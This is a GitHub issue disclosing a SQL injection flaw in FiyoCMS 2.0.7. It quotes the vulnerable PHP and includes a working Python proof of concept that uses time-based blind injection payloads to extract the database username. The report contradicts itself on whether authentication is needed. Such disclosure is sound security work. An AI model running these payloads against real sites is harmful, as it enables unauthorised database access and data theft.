Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in FiyoCMS 2.0.7 #9

Open
xrmht opened this issue Dec 3, 2017 · 0 comments
Open

SQL injection in FiyoCMS 2.0.7 #9

xrmht opened this issue Dec 3, 2017 · 0 comments

Comments

@xrmht
Copy link

xrmht commented Dec 3, 2017

Good day.
I found a SQL injection vulnerability in FiyoCMS 2.0.7.This vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database.

There is no need to login in when exploiting this vulnerability

File location: /system/site.php

if(_FINDEX_ != 'BACK') {
//
//
}
	else if (SEF_URL){
		if(!empty($pid) AND $pid ==  menuInfo('id')){
			define('Page_ID', $pid);
		}
		else if(isset($_GET['pid']) AND is_numeric($_GET['pid'])) {	
			define('Page_ID', pageInfo($_GET['pid'],'id'));
		}
		else {
			$pid = @check_permalink('permalink',$_REQUEST['link'],'pid');
			if($pid == 0) $pid = oneQuery('menu','global',1,'id');		
			if($pid == 0) $pid = oneQuery('menu','home',1,'id');		
			define('Page_ID', $pid);
		}
	}
}

Noticed that the function check_permalink Put the parameters $_REQUEST['link'] into the database query without filtered
file:
system/function.php

function check_permalink($field,$value ,$output = null, $like = null) {
	if(empty($like))
		$link = FQuery("permalink","$field = '$value'",$output);
	else
		$link = FQuery("permalink","$field LIKE '%$value%'",$output);
	if(empty($value) or empty($link))
		$link = false;
	else if(empty($output) AND $link > 0) 
		$link = true;
	return $link;
}

qq 20171203162140
qq 20171203162254

Python poc code:

import requests
import time

if __name__ == '__main__':
    Target_url = 'http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/'

    print 'Began to guess the length of the database user name !!'
    for x in range(50):
        start_time = time.time()
        payload = '''?link=u'union/**/select/**/1,2,3,4,0/**/or/**/if(length(user())={x},sleep(0.3),0)/**/or/**/0,'6'''.format(x=x)
        headers = {'Referer': Target_url}
        response = requests.get(
            Target_url + '/' + payload,
            headers=headers)
        end_time = time.time()
        if (end_time - start_time) > 1:
            length = x
            break

    print 'The database user name length is {length} !!'.format(length=length)

    print 'Start guessing the database username !!'
    username = ''
    for x in range(length + 1):
        pay_str = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
        for p in pay_str:
            start_time = time.time()
            headers = {'Referer': Target_url}
            payload = '''?link=u'union/**/select/**/1,2,3,4,0/**/or/**/if(substr(user(),{q},1)='{w}',sleep(0.3),0)/**/or/**/0,'6'''.format(q=x, w=p)
            response = requests.get(
                Target_url + '/' + payload,
                headers=headers)
            end_time = time.time()
            if (end_time - start_time) > 1:
                username = username + p
                print username
                break
    print 'The database user name is {username}'.format(username=username)

qq 20171203162511
I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant